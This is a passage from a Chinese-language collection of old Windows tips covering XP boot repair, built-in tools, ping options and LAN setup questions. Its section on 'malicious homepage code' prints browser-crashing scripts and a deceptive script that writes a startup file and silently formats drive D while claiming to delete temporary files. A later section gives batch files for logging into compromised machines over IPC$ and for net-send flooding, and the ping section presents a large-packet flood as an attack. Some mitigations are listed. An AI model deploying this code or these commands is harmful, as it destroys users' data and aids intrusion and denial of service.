XP時(shí)設(shè)置的管理員密碼,,回車,,出現(xiàn)D:\Windows〉,這時(shí)需要輸入修復(fù)命令Fixboot,,后面的參數(shù)為啟動(dòng)扇區(qū)要寫入的磁盤盤符,,這里填入C:,回車,。修復(fù)完成,,鍵入Exit退出。重啟后就會(huì)看到久違的雙重啟動(dòng)菜單了,。并且,,這樣修復(fù)后基本不產(chǎn)生垃圾文件。 因?yàn)檫@兩個(gè)問(wèn)題是非常非常普遍的,,所以我就收集到這里了~ 28)這里說(shuō)幾個(gè)主頁(yè)惡意代碼:『并不是讓大家把這些代碼加入到自己的主頁(yè)中,!只是希望大家能了解惡意代碼,起到更好的防護(hù)作用,!』 A,、死循環(huán)代碼: 『把下列代碼加入到網(wǎng)頁(yè)中,可達(dá)到如上效果』 <img src=javascript:location=“網(wǎng)頁(yè)的文件名.htm:”> 說(shuō)明:當(dāng)含有這段代碼的網(wǎng)頁(yè)被人點(diǎn)擊,,連接就會(huì)不斷的打開IE瀏覽器,,直到你的系統(tǒng)資源浪費(fèi)到0%~只有重新啟動(dòng)才能正常使用! 預(yù)防方法:禁用所有的ActiveX控件和插件,!因?yàn)檫@是一個(gè)ActiveX教本程序~ B,、恐怖的大圖片: 『把下列代碼加入到網(wǎng)頁(yè)中,可達(dá)到如上效果』 <img src= "http://恐怖圖片的連接地址" width= "1" height= "100000000000000000000000"> 說(shuō)明:當(dāng)打開這樣的網(wǎng)頁(yè),,IE會(huì)不斷的解釋試圖打開,,但由于圖片實(shí)在太大,,超出了其處理能力,所以…… C,、地震死機(jī)代碼: 『把下列代碼加入到網(wǎng)頁(yè)中,,可達(dá)到如上效果』 <script> if (window.top.moveBy){ for (i = 1;i < 50; i++){ for (j = 3;j > 0; j--){ window.top.moveBy(0,i); window.top.moveBy(i,0); window.top.moveBy(0,-i*2); window.top.moveBy(-i*2,0); window.top.moveBy(0,i); window.top.moveBy(i,0); } } } </script> <img src="c:\con\con"> 說(shuō)明:<img src="c:\con\con">是windows9x的設(shè)備名稱解析漏洞! WINDOWS9x的\con\con設(shè)備名稱解析漏洞允許用戶進(jìn)行攻擊,,倒是98死機(jī)。原理:我們知道,,CON是DOS下的特殊設(shè)備名,,不允許做文件名,如果我們?cè)贒OS下鍵入如下命令:copy coldcrysky.txt con,,系統(tǒng)會(huì)顯示coldcrysky.txt的內(nèi)容,如果換成:copy coldcrysky.txt>con系統(tǒng)會(huì)提示文件不能拷貝到文件自身,。如果吧con換成LPT或PRN,,則輸出coldcrysky.txt到打印機(jī)。由此可見,,CON代表文件本身,,如果使用\CON\CON命令,,則意味著系統(tǒng)不斷調(diào)用文件本身,,視系統(tǒng)資源迅速枯竭,,連按CTRL+ALT+DEL的機(jī)會(huì)都沒(méi)有~ 解決辦法: 對(duì)于9X系統(tǒng),強(qiáng)烈建議打補(bǔ)?。。,?!2000和XP則不會(huì)死機(jī)~ D、格式化硬盤:(最恐怖的~~~慎用?。,。≌?qǐng)勿用于非法用途?。,?!使用后如果有任何負(fù)作用,,后果自負(fù),!與傷寒天空『ColdCrySky』,;亂刀留影無(wú)關(guān)!?。,。?br> scr,Reset(); scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\啟動(dòng)\\startup.htm"; scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>" WSH.rUN(`start/m format.com d:/q/autotest/u`); alert(`IMPORTANT : Windows is removing unused temporary files.`); scr.write(); 說(shuō)明:當(dāng)您瀏覽了網(wǎng)頁(yè),會(huì)把startup.hta文件寫入啟動(dòng)文件夾,,并提示W(wǎng)INDOWS正在刪除臨時(shí)文件,!實(shí)際上是在格式化你的D盤,代碼中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對(duì)應(yīng)為:Windows Scripting Host Shell Object,。代碼中的:WSH全稱是:Windows Scripting Host,,是微軟的一種基于32位系統(tǒng)平臺(tái)與語(yǔ)言無(wú)關(guān)的教本解釋機(jī)制,它使得腳本能在WINDOWS桌面或命令提示符下運(yùn)行~WSH所對(duì)應(yīng)的程序WScript.exe是一個(gè)腳本語(yǔ)言解釋器,,位于WINDOWS所在文件夾下,,所以它可以像執(zhí)行批處理文件一樣執(zhí)行WSH腳本程序~ 解決方法:1)更新您的瀏覽器,使用最新的瀏覽器上網(wǎng),! 2)修改msdos.sys,,在其中加入:Bootmentu=0命令行,目的是禁用啟動(dòng)菜單,。 3)吧format.com改名 4)禁用WSH,。具體方法:在win98中,從添加刪除程序中點(diǎn)擊WINDOWS安裝程序,,打開附件一項(xiàng),,將WINDOWS SCRIPTING HOST前面的選項(xiàng)去掉,就可以卸載掉WSH了~~~win2000和xp的用戶可以在我的電腦-工具菜單-文件夾選項(xiàng)-選擇文件類型,,找到VBS VBSCRIPT FILE選項(xiàng),,點(diǎn)擊刪除,! 29)系統(tǒng)自帶的系統(tǒng)工具 其實(shí)無(wú)論大家從什么地方,什么方法找到一些好用的工具,都不如Windows自帶的工具用著方便(假設(shè)你區(qū)的地方正好不能上網(wǎng),,而你又沒(méi)有準(zhǔn)備好這些工具,,那怎么辦?呵呵,,不用著急,,用好下面幾個(gè)Windows自帶的小工具,,可以使你事半功倍?。?br> 1,、msinfo32.exe 位于C:\Program Files\Common Files Microsoft Shared\Msinfo\msinfo32.exe,顯示計(jì)算機(jī)中的有關(guān)系統(tǒng)信息,,可用其診斷,、解決計(jì)算機(jī)問(wèn)題并查看遠(yuǎn)程系統(tǒng)所生成的系統(tǒng)報(bào)告。 2,、drwatson.exe --這個(gè)工具給我特別的親密感覺(jué):第一次使用這個(gè)工具是在看了LK007大哥給cool兄弟的回復(fù)以后,,我馬上試驗(yàn)~果然很有意思!LK007不愧是大哥,!現(xiàn)在想起來(lái)都佩服不已~~~ 位于C: \Windows \drwatson.exe,,當(dāng)某個(gè)應(yīng)用程序在運(yùn)行過(guò)程中出錯(cuò)時(shí),它就會(huì)將出錯(cuò)的程序以及出錯(cuò)的內(nèi)存地址一一記錄下來(lái),,并保存為Windows的Drwatson子目錄下的*.wlg記錄文件,。 3、sfc.exe 位于C:\Windows\System\sfc.exe,,用于自動(dòng)搜索被改變,、刪除或損壞了的系統(tǒng)文件。 4、msconfig.exe 位于C:\Windows\System\msconfig.exe,,通過(guò)修改啟動(dòng)方式以及啟動(dòng)時(shí)運(yùn)行哪些應(yīng)用程序等系統(tǒng)配置,,從而達(dá)到快速排除故障的目的。 5,、scanreg.exe 位于C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本),,用于檢查、修復(fù),、備份以及還原系統(tǒng)注冊(cè)表及相關(guān)配置文件的工具軟件,,防止因注冊(cè)表數(shù)據(jù)被破壞而導(dǎo)致的系統(tǒng)故障。 6,、vcmui.exe 位于C:\Windows\vcmui.exe,,在后臺(tái)自動(dòng)將被覆蓋的驅(qū)動(dòng)程序備份下來(lái),當(dāng)我們安裝的新驅(qū)動(dòng)出錯(cuò)時(shí)可用它進(jìn)行恢復(fù),。 7,、winrep.exe 位于C:\Windows\winrep.exe,能自動(dòng)收集有關(guān)系統(tǒng)信息并提示用戶輸入故障所在,,幫我們編寫一篇完整的“求援”報(bào)告,,并將其發(fā)送給有關(guān)技術(shù)維護(hù)人員,簡(jiǎn)化“求援”操作,。 這七個(gè)Windows自帶的小程序可以在開始菜單--運(yùn)行中直接輸入文件名(無(wú)需輸入擴(kuò)展名)調(diào)出該程序,! 31)批處理在入侵中的幾則妙用! A,、簡(jiǎn)化IPC$登陸肉雞的操作: 用記事本建立一個(gè)名字為:ipcruqin.bat的批處理文件,,內(nèi)容如下: @net use \\%1\ipc$ %3 /u:"%2" @echo OK!已經(jīng)成功建立連接 之后,,大家在CMD下輸入:ipcruqin.bat 肉雞IP 肉雞的admin賬號(hào)/用戶的密碼,。就可以登陸上去了,而不需要那一大長(zhǎng)串的命令了,! B,、批處理轟炸對(duì)方電腦: 打開一記事本,在里面輸入如下內(nèi)容: @echo 正在轟炸中…… tart @net send %1 %2 @if errorlevel 1 goto over goto start ver @echo 發(fā)送失敗 將其保存為bat格式的文件即可,,使用方法:*.bat(該批處理文件的名字)+ 空格 + 目標(biāo)IP + 空格 + 你要對(duì)他說(shuō)得話,! 這次先簡(jiǎn)單介紹這三個(gè)!等下次有機(jī)會(huì)再給大家介紹更多的批處理文件的用途,! 32)再說(shuō)幾個(gè)非常簡(jiǎn)單實(shí)用的DOS命令(工具): A,、fport.exe --查看那些端口都是那些程序使用的命令。 B,、netstat -an --查看那些端口于外部的IP連接,。比如這里顯示 :23 XX.XX.XX.XX 而你又沒(méi)有開23端口,,那么,呵呵……還用我說(shuō)么,? C,、letmain.exe \\ip -admin -d --列出本機(jī)的administrators組的用戶名查看是否有異常。 D,、pslist.exe --列出進(jìn)程 E,、pskill.exe --殺掉進(jìn)程,有時(shí)候再任務(wù)管理器中無(wú)法終止程序,,那就用這個(gè)工具來(lái)停止進(jìn)程,。 F、login.exe --列出當(dāng)前有那些用戶登陸再你的機(jī)器上,。 ping命令詳解 ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list Options: -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C. 不停的ping地方主機(jī),,直到你按下Control-C。 此功能沒(méi)有什么特別的技巧,,不過(guò)可以配合其他參數(shù)使用,,將在下面提到。 -a Resolve addresses to hostnames. 解析計(jì)算機(jī)NetBios名,。 示例:C:\>ping -a 192.168.1.21 Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data: Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Ping statistics for 192.168.1.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms 從上面就可以知道IP為192.168.1.21的計(jì)算機(jī)NetBios名為iceblood.yofor.com,。 -n count Number of echo requests to send. 發(fā)送count指定的Echo數(shù)據(jù)包數(shù)。 在默認(rèn)情況下,,一般都只發(fā)送四個(gè)數(shù)據(jù)包,,通過(guò)這個(gè)命令可以自己定義發(fā)送的個(gè)數(shù),對(duì)衡量網(wǎng)絡(luò)速度很有幫助,,比如我想測(cè)試發(fā)送50個(gè)數(shù)據(jù)包的返回的平均時(shí)間為多少,,最快時(shí)間為多少,最慢時(shí)間為多少就可以通過(guò)以下獲知: C:\>ping -n 50 202.103.96.68 Pinging 202.103.96.68 with 32 bytes of data: Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Request timed out. ……………… Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Ping statistics for 202.103.96.68: Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: Minimum = 40ms, Maximum = 51ms, Average = 46ms 從以上我就可以知道在給202.103.96.68發(fā)送50個(gè)數(shù)據(jù)包的過(guò)程當(dāng)中,,返回了48個(gè),,其中有兩個(gè)由于未知原因丟失,,這48個(gè)數(shù)據(jù)包當(dāng)中返回速度最快為40ms,,最慢為51ms,平均速度為46ms,。 -l size Send buffer size. 定義echo數(shù)據(jù)包大小,。 在默認(rèn)的情況下windows的ping發(fā)送的數(shù)據(jù)包大小為32byt,我們也可以自己定義它的大小,,但有一個(gè)大小的限制,,就是最大只能發(fā)送65500byt,也許有人會(huì)問(wèn)為什么要限制到65500byt,,因?yàn)閃indows系列的系統(tǒng)都有一個(gè)安全漏洞(也許還包括其他系統(tǒng))就是當(dāng)向?qū)Ψ揭淮伟l(fā)送的數(shù)據(jù)包大于或等于65532時(shí),,對(duì)方就很有可能擋機(jī),所以微軟公司為了解決這一安全漏洞于是限制了ping的數(shù)據(jù)包大小。雖然微軟公司已經(jīng)做了此限制,,但這個(gè)參數(shù)配合其他參數(shù)以后危害依然非常強(qiáng)大,,比如我們就可以通過(guò)配合-t參數(shù)來(lái)實(shí)現(xiàn)一個(gè)帶有攻擊性的命令:(以下介紹帶有危險(xiǎn)性,僅用于試驗(yàn),,請(qǐng)勿輕易施于別人機(jī)器上,,否則后果自負(fù)) C:\>ping -l 65500 -t 192.168.1.21 Pinging 192.168.1.21 with 65500 bytes of data: Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 ……………… 這樣它就會(huì)不停的向192.168.1.21計(jì)算機(jī)發(fā)送大小為65500byt的數(shù)據(jù)包,如果你只有一臺(tái)計(jì)算機(jī)也許沒(méi)有什么效果,,但如果有很多計(jì)算機(jī)那么就可以使對(duì)方完全癱瘓,,我曾經(jīng)就做過(guò)這樣的試驗(yàn),當(dāng)我同時(shí)使用10臺(tái)以上計(jì)算機(jī)ping一臺(tái)Win2000Pro系統(tǒng)的計(jì)算機(jī)時(shí),,不到5分鐘對(duì)方的網(wǎng)絡(luò)就已經(jīng)完全癱瘓,,網(wǎng)絡(luò)嚴(yán)重堵塞,HTTP和FTP服務(wù)完全停止,,由此可見威力非同小可,。 -f Set Don`t Fragment flag in packet. 在數(shù)據(jù)包中發(fā)送“不要分段”標(biāo)志。 在一般你所發(fā)送的數(shù)據(jù)包都會(huì)通過(guò)路由分段再發(fā)送給對(duì)方,,加上此參數(shù)以后路由就不會(huì)再分段處理,。 -i TTL Time To Live. 指定TTL值在對(duì)方的系統(tǒng)里停留的時(shí)間。 此參數(shù)同樣是幫助你檢查網(wǎng)絡(luò)運(yùn)轉(zhuǎn)情況的,。 -v TOS Type Of Service. 將“服務(wù)類型”字段設(shè)置為 tos 指定的值,。 -r count Record route for count hops. 在“記錄路由”字段中記錄傳出和返回?cái)?shù)據(jù)包的路由。 在一般情況下你發(fā)送的數(shù)據(jù)包是通過(guò)一個(gè)個(gè)路由才到達(dá)對(duì)方的,,但到底是經(jīng)過(guò)了哪些路由呢,?通過(guò)此參數(shù)就可以設(shè)定你想探測(cè)經(jīng)過(guò)的路由的個(gè)數(shù),不過(guò)限制在了9個(gè),,也就是說(shuō)你只能跟蹤到9個(gè)路由,,如果想探測(cè)更多,可以通過(guò)其他命令實(shí)現(xiàn),,我將在以后的文章中給大家講解,。以下為示例: C:\>ping -n 1 -r 9 202.96.105.101 (發(fā)送一個(gè)數(shù)據(jù)包,最多記錄9個(gè)路由) Pinging 202.96.105.101 with 32 bytes of data: Reply from 202.96.105.101: bytes=32 time=10ms TTL=249 Route: 202.107.208.187 -> 202.107.210.214 -> 61.153.112.70 -> 61.153.112.89 -> 202.96.105.149 -> 202.96.105.97 -> 202.96.105.101 -> 202.96.105.150 -> 61.153.112.90 Ping statistics for 202.96.105.101: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 10ms, Maximum = 10ms, Average = 10ms 從上面我就可以知道從我的計(jì)算機(jī)到202.96.105.101一共通過(guò)了202.107.208.187 ,,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97這幾個(gè)路由,。 -s count Timestamp for count hops. 指定 count 指定的躍點(diǎn)數(shù)的時(shí)間戳。 此參數(shù)和-r差不多,,只是這個(gè)參數(shù)不記錄數(shù)據(jù)包返回所經(jīng)過(guò)的路由,,最多也只記錄4個(gè)。 -j host-list Loose source route along host-list. 利用 computer-list 指定的計(jì)算機(jī)列表路由數(shù)據(jù)包,。連續(xù)計(jì)算機(jī)可以被中間網(wǎng)關(guān)分隔(路由稀疏源)IP 允許的最大數(shù)量為 9,。 -k host-list Strict source route along host-list. 利用 computer-list 指定的計(jì)算機(jī)列表路由數(shù)據(jù)包,。連續(xù)計(jì)算機(jī)不能被中間網(wǎng)關(guān)分隔(路由嚴(yán)格源)IP 允許的最大數(shù)量為 9。 -w timeout Timeout in milliseconds to wait for each reply. 指定超時(shí)間隔,,單位為毫秒,。 此參數(shù)沒(méi)有什么其他技巧。 ping命令的其他技巧:在一般情況下還可以通過(guò)ping對(duì)方讓對(duì)方返回給你的TTL值大小,,粗略的判斷目標(biāo)主機(jī)的系統(tǒng)類型是Windows系列還是UNIX/Linux系列,,一般情況下Windows系列的系統(tǒng)返回的TTL值在100-130之間,而UNIX/Linux系列的系統(tǒng)返回的TTL值在240-255之間,,當(dāng)然TTL的值在對(duì)方的主機(jī)里是可以修改的,,Windows系列的系統(tǒng)可以通過(guò)修改注冊(cè)表以下鍵值實(shí)現(xiàn): [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters] "DefaultTTL"=dword:000000ff 255---FF 128---80 64----40 32----20 好了,ping命令也基本上完全講解完了,,其中還有-j,-k參數(shù)我還沒(méi)有詳細(xì)說(shuō)明,,由于某些原因也包括我自己所收集的資料過(guò)少這里也沒(méi)有向大家詳細(xì)介紹,請(qǐng)大家見諒,,如果在看了這篇文章的朋友當(dāng)中有知道得比我更多的,,以及其他使用技巧的也希望您能告訴我,并在此先謝過(guò),。 局域網(wǎng)應(yīng)用問(wèn)題專題解答 (Rayi々) 1,、問(wèn):我訪問(wèn)局域網(wǎng)中的計(jì)算機(jī)時(shí),為什么常常被提示要輸入用戶名和密碼,? 答:這主要是為了安全方面的考慮,。而且當(dāng)你重新啟動(dòng)計(jì)算機(jī)時(shí)又要重新輸入用戶名和密碼,這一點(diǎn)確實(shí)讓人會(huì)覺(jué)得很麻煩,。 你只要在需要進(jìn)行文件共享的計(jì)算機(jī)上建立一個(gè)相同的用戶名,,并且使用相同的密碼,然后局域網(wǎng)中的計(jì)算機(jī)都利用這個(gè)用戶名和密碼登錄,,這樣在網(wǎng)上鄰居中訪問(wèn)對(duì)方計(jì)算機(jī)時(shí)就不需要輸入用戶名和密碼了,。 2、問(wèn):上網(wǎng)瀏覽前在局域網(wǎng)中應(yīng)如何對(duì)IE進(jìn)行設(shè)置,? 答:在局域網(wǎng)中使用代理服務(wù)器上網(wǎng)瀏覽時(shí),,應(yīng)對(duì)瀏覽器進(jìn)行必要的設(shè)置。以IE為例,,在瀏覽器中代理服務(wù)器的設(shè)置方法為:用鼠標(biāo)右擊桌面上的IE圖標(biāo),,在彈出的右鍵菜單中選擇“屬性”命令,。在打開的“Internet 屬性”對(duì)話框中選擇“連接”項(xiàng),,然后點(diǎn)擊“局域網(wǎng)設(shè)置”,在“局域網(wǎng)(LAN)設(shè)置”對(duì)話框中選中“使用代理服務(wù)器”,,并輸入代理服務(wù)器的地址以及端口,。 默認(rèn)對(duì)于HTTP,、FTP瀏覽器都是使用相同的代理服務(wù)器設(shè)置,如果對(duì)這些服務(wù)有不同的代理,,你就需要進(jìn)行其他的設(shè)置,。 方法為:點(diǎn)擊“高級(jí)”按鈕,取消“對(duì)所有協(xié)議均使用相同的代理服務(wù)器”,,并分別在不同的服務(wù)中輸入各自的地址和端口,,保存以上設(shè)置后,IE就可以使用代理服務(wù)器上網(wǎng)了,。 3,、問(wèn):在局域網(wǎng)中應(yīng)如何設(shè)置OutLook Express收發(fā)郵件? 答:在局域網(wǎng)中OE等電子郵件收發(fā)軟件同樣可以通過(guò)代理服務(wù)器上網(wǎng),,只是不能再使用原來(lái)的單機(jī)撥號(hào)上網(wǎng)設(shè)置,。而且相對(duì)于其他軟件的代理服務(wù)器設(shè)置,郵件軟件的服務(wù)器設(shè)置要更為特殊一點(diǎn),,其代理服務(wù)器的類型必須是Socks4或Socks5的服務(wù)器,。假設(shè)所使用的代理服務(wù)器的地址為:202.102.49.141,用戶的郵件地址為:[email protected],。 那么在OE中代理服務(wù)器的設(shè)置方法為:打開OE后,,選擇菜單“工具→賬戶”。在“Internet賬戶”中選擇“郵件”選項(xiàng)卡,,然后在賬戶列表中選擇需要設(shè)置的賬戶,,點(diǎn)擊“屬性”按鈕。在屬性窗口中選擇“服務(wù)器”選項(xiàng)卡(圖1),,在接收和發(fā)送郵件服務(wù)器地址中輸入代理服務(wù)器的地址(如202.102.49.141),,并按“用戶名#郵件真實(shí)的收信地址”的命名規(guī)則,在賬戶名中輸入 “jjxm#POP3.163.com”,,單擊“確定”保存后即可在代理服務(wù)器中收發(fā)郵件了,。 4、問(wèn):在由三臺(tái)電腦組成的局域網(wǎng)中,,我在其中一臺(tái)電腦上用過(guò)Windows優(yōu)化大師后,,為什么這臺(tái)電腦就不能登錄網(wǎng)絡(luò),并且還提示找不到撥號(hào)適配器,? 答:根據(jù)你說(shuō)的情況,,是沒(méi)有安裝“撥號(hào)網(wǎng)絡(luò)”。解決方法是:在“控制面板”的“添加/刪除程序”中,,選擇“Windows安裝程序”,,在“組件”的“通訊”中選擇“撥號(hào)網(wǎng)絡(luò)”,然后將Windows安裝盤放入光驅(qū)進(jìn)行安裝,,重新啟動(dòng)計(jì)算機(jī)后就可使用撥號(hào)網(wǎng)絡(luò)了,。 5,、問(wèn):如何在局域網(wǎng)中設(shè)置QQ、ICQ等即時(shí)通訊軟件,? 答:在QQ的主窗口中點(diǎn)擊“QQ2000”的按鈕,,在其主菜單中選擇“系統(tǒng)參數(shù)”,在參數(shù)窗口中選擇“網(wǎng)絡(luò)設(shè)置”選項(xiàng)卡,。首先在“上網(wǎng)類型”中選擇“局域網(wǎng)接入Internet”,,再選中“使用Socks5代理服務(wù)器”,然后輸入服務(wù)器的地址以及端口(圖2),,如果代理服務(wù)器中設(shè)定了用戶密碼,,還需要輸入用戶名和密碼。輸入完畢后可以點(diǎn)擊“測(cè)試”按鈕來(lái)檢測(cè)其代理是否正常,。最后單擊“確定”即可在代理服務(wù)器中使用QQ了,。 類似地,在ICQ中選擇“連接”中的“防火墻”,,可以定義多個(gè)代理服務(wù)器,,如Socks4、Socks5,、HTTPS等,。你首先要確定并選擇所使用的代理服務(wù)器類型,然后在“代理服務(wù)器”部分輸入主機(jī)的地址,、端口,,如果代理服務(wù)器設(shè)置了用戶密碼,還必須輸入用戶名和密碼,。對(duì)于代理服務(wù)器的類型,、地址、端口等,,如果你不太清楚,,可以詢問(wèn)網(wǎng)絡(luò)管理員。 6,、問(wèn):我想用NetMeeting進(jìn)行局域網(wǎng)中的通話,,應(yīng)該如何設(shè)置? 答:如果你首次打開NetMeeting,,軟件會(huì)自動(dòng)啟動(dòng)配置向?qū)?。在配置向?qū)Т翱邳c(diǎn)擊“下一步”,然后輸入你的基本信息(如姓名,、E-mail等),。繼續(xù)單擊“下一步”,進(jìn)入服務(wù)器配置窗口,NetMeeting允許啟動(dòng)時(shí)登錄到目標(biāo)服務(wù)器,,這個(gè)功能是針對(duì)于普通上網(wǎng)用戶的,,局域網(wǎng)用戶并不需要該功能,,因此你必須取消該選項(xiàng),。繼續(xù)單擊“下一步”,選擇網(wǎng)絡(luò)速度,,必須選擇“局域網(wǎng)”,,然后提示是否建立快捷方式,你可以根據(jù)需要進(jìn)行選擇,。接下來(lái)進(jìn)行音頻調(diào)節(jié)測(cè)試后就完成了局域網(wǎng)中對(duì)NetMeeting的設(shè)置,。 7、問(wèn):我知道在局域網(wǎng)內(nèi)文件是可以共享的,,但我想問(wèn)的是,,打印機(jī)和掃描儀應(yīng)該如何共享? 答:先來(lái)說(shuō)說(shuō)打印機(jī)的共享方法,。你可以先在局域網(wǎng)內(nèi)找一臺(tái)電腦,,并把打印機(jī)連接到這臺(tái)電腦上,然后按照說(shuō)明書為打印機(jī)安裝好驅(qū)動(dòng)程序,。在Windows系統(tǒng)任務(wù)欄上,,點(diǎn)擊“開始→設(shè)置→控制面板”,在“控制面板”窗口中雙擊“打印機(jī)”圖標(biāo),,再用鼠標(biāo)右鍵單擊打印機(jī)圖標(biāo),,在彈出的右鍵菜單上選擇“共享”,然后在打開的“打印機(jī)屬性”窗口上選擇“共享為”,,并像共享文件那樣給被共享的打印機(jī)也起一個(gè)共享名,,然后點(diǎn)擊“確定”即可。 關(guān)于掃描儀的共享設(shè)置,,你首先要看一下你的掃描儀是否具有網(wǎng)絡(luò)共享功能,,是否配備了用于共享的驅(qū)動(dòng)程序,也就是說(shuō)只有部分掃描儀可以進(jìn)行網(wǎng)絡(luò)共享,。另外不同型號(hào)掃描儀的共享設(shè)置差異很大,,最好查閱一下掃描儀的說(shuō)明書。 8,、我用分機(jī)線上網(wǎng),,上網(wǎng)速度最大才48000bps,請(qǐng)問(wèn)是何原因,? 還有,,將Modem放在主機(jī)箱側(cè)面,開機(jī)后(未打開Modem電源),,家里的電話就處于忙音狀態(tài),,如何解決,? 答:第一個(gè)問(wèn)題跟你的分機(jī)電話線或線接頭質(zhì)量有很大關(guān)系,另外,,如果你的Modem的速度平常都能接近48000bps,,你也不要太在意,應(yīng)該重點(diǎn)先看下它的實(shí)際下載速度是否令你滿意,。第二個(gè)問(wèn)題,,肯定和你主機(jī)的電源等配件的電磁輻射強(qiáng)和屏蔽效果差有關(guān),你如果不想對(duì)你的主機(jī)進(jìn)行大換血的話,,最好用物體在主機(jī)和Modem之間進(jìn)行屏蔽,,或?qū)odem離你的主機(jī)遠(yuǎn)點(diǎn),這是最好的辦法,。 9,、我新購(gòu)的網(wǎng)卡在電腦上無(wú)法安裝,而在其他電腦上卻使用正常,,這是怎么回事,? 答:如果在電腦中安裝好網(wǎng)卡后,系統(tǒng)沒(méi)有提示找到新硬件,,你可運(yùn)行“添加新硬件向?qū)А眮?lái)讓系統(tǒng)搜索新硬件,。方法是單擊“開始”,指向“設(shè)置”,,單擊“控制面板”,,然后再雙擊“添加新硬件”。按照屏幕提示操作,。你可選“讓W(xué)indows搜索新硬件嗎,?”,單擊“是(推薦)”,,然后再單擊“下一步”,,讓系統(tǒng)找到網(wǎng)卡再安裝其驅(qū)動(dòng)。 而如果出現(xiàn)以下任何現(xiàn)象,,網(wǎng)卡或者網(wǎng)卡所在的插槽損壞: 1,、“添加新硬件向?qū)А睓z測(cè)不到網(wǎng)卡; 2,、“添加新硬件向?qū)А蹦軌驒z測(cè)到網(wǎng)卡,,但無(wú)法正常工作。 為了確定到底是網(wǎng)卡還是插槽的問(wèn)題,,可以檢查網(wǎng)卡是否牢靠插入插槽之中,。如果網(wǎng)卡已牢靠插入插槽之中,請(qǐng)改插到其他插槽之中試試。如果問(wèn)題仍未解決,,則可能是網(wǎng)卡損壞或與你的電腦不兼容,,可更換之。 10,、我的電腦出現(xiàn)“網(wǎng)上鄰居”中找不到其他聯(lián)網(wǎng)電腦的故障,,如何解決? 答:“網(wǎng)上鄰居”是按工作組顯示計(jì)算機(jī)的,。如果你的電腦沒(méi)有設(shè)置工作組名稱,,打開“網(wǎng)上鄰居”時(shí)就可能看不到其他電腦,。單擊“開始”,,指向“設(shè)置”,單擊“控制面板”,,雙擊“網(wǎng)絡(luò)”,,然后再單擊“標(biāo)識(shí)”選項(xiàng)卡。你局域網(wǎng)中所有電腦“工作組”框中的名稱應(yīng)為一樣,,如有不同你可在此框中鍵入相同的工作組名稱,,然后單擊“確定”重啟電腦既可。 此外,,如果“網(wǎng)上鄰居”中不出現(xiàn)“整個(gè)網(wǎng)絡(luò)”圖標(biāo),,可能是在Windows中沒(méi)有安裝必要的網(wǎng)絡(luò)組件。要與網(wǎng)絡(luò)上的其他計(jì)算機(jī)連接,,則必須安裝以下組件:Microsoft網(wǎng)絡(luò)客戶,、網(wǎng)絡(luò)適配器、至少一種網(wǎng)絡(luò)協(xié)議(如IPX/SPX,、TCP/IP等),。可打開“網(wǎng)絡(luò)”,,檢查“配置”選項(xiàng)卡上的列表,,確保已安裝了各種必要的網(wǎng)絡(luò)組件。如有,,你可重新安裝各種缺少的組件即可,。 11、問(wèn):公司局域網(wǎng),,只有一臺(tái)機(jī)器通過(guò)貓接入互聯(lián)網(wǎng),,現(xiàn)想其他機(jī)器接入互聯(lián)網(wǎng),請(qǐng)問(wèn)如何實(shí)現(xiàn),? 答:這是一個(gè)比較典型的代理上網(wǎng)問(wèn)題,。你可以在帶貓的機(jī)器上安裝代理上網(wǎng)軟件(如Sygate、Wingate、Winproxy)或直接使用Windows自帶的共享上網(wǎng)功能上網(wǎng)(Windows 98第二版以上才帶此功能),。建議使用Sygate,,該軟件設(shè)置較簡(jiǎn)單。先撥號(hào)上網(wǎng),,后安裝Sygate,,完畢后,Sygate將檢測(cè)互聯(lián)網(wǎng)的連接狀態(tài),,并自動(dòng)設(shè)置,。在其他需要代理上網(wǎng)的機(jī)器上,指定網(wǎng)關(guān)和DNS的 IP地址,,步驟為網(wǎng)上鄰居→右鍵→屬性→TCP/IP協(xié)議→屬性→DNS,,輸入當(dāng)?shù)豂SP的IP地址→網(wǎng)關(guān),輸入代理服務(wù)器的IP地址→確定→重啟,。設(shè)置完畢后,,其他各項(xiàng)應(yīng)用軟件均無(wú)須設(shè)置。 12,、問(wèn):局域網(wǎng)通過(guò)路由器,、使用ADSL方式上網(wǎng),如何使各工作站快速的獲得可以上網(wǎng)的IP地址而不手工去指定,? 答:假如使用Windows 2000,,可以直接使用Windows 2000自帶的dhcp功能,首先建立一個(gè)作用域,,然后為這個(gè)作用域添加DNS的搜索順序和路由器的IP地址,,DNS搜索順序?yàn)楫?dāng)?shù)豂SP的IP地址,路由器的IP地址即設(shè)置成當(dāng)前局域網(wǎng)的路由器IP地址,,其他機(jī)器則不指定IP地址,,如非使用Windows 2000,則可使用第三方的dhcp軟件,,比如代理軟件sygate和wingate都帶有dhcp功能,。 13、問(wèn):公司要組建局域網(wǎng),,需要用到郵件服務(wù)器和WWW服務(wù)器,,請(qǐng)問(wèn)這兩種服務(wù)放到一臺(tái)電腦里還是分別用兩臺(tái)電腦?都用什么軟件,?謝謝,! 